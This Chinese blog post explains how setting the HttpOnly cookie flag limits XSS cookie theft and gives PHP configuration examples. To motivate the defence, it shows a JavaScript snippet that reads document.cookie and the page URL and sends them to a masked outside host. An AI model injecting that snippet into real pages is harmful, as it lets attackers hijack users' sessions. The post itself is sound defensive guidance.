zoukankan      html  css  js  c++  java
  • 利用HttpOnly来防御xss攻击

    xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的站点出现xss漏洞,就能够运行随意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,假设这里面包括了大量敏感信息(身份信息,管理员信息)等,那完了。。。

    例如以下js获取cookie信息:

         url=document.top.location.href;
         cookie=document.cookie;
         c=new Image();
         c.src=’http://www.******.com/c.php?c=’+cookie+’&u=’+url;


    一般cookie都是从document对象中获取的,如今浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的參数,跟domain等其它參数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。
    PHP设置HttpOnly:
    1. //在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
    2. ini_set("session.cookie_httponly", 1);
    3.  
    4. //或者setcookie()的第七个參数设置为true
    5. session_set_cookie_params(0, NULL, NULL, NULL, TRUE);

    对于PHP5.1曾经版本号的PHP通过:
    1. header("Set-Cookie: hidden=value; httpOnly");

    最后,HttpOnly不是万能的!
  • 相关阅读:
    lnmp+memcache+tomcat
    redis的主从搭建
    curl只取状态码
    Tomcat的优化
    pip9 安装 centos6.8
    文件的下载
    保存图片到图库更新图库
    上传图片总结
    Android 大图片预览ViewPager
    Android 软件盘 Editext 问题
  • 原文地址:https://www.cnblogs.com/mfrbuaa/p/4001692.html
Copyright © 2011-2022 走看看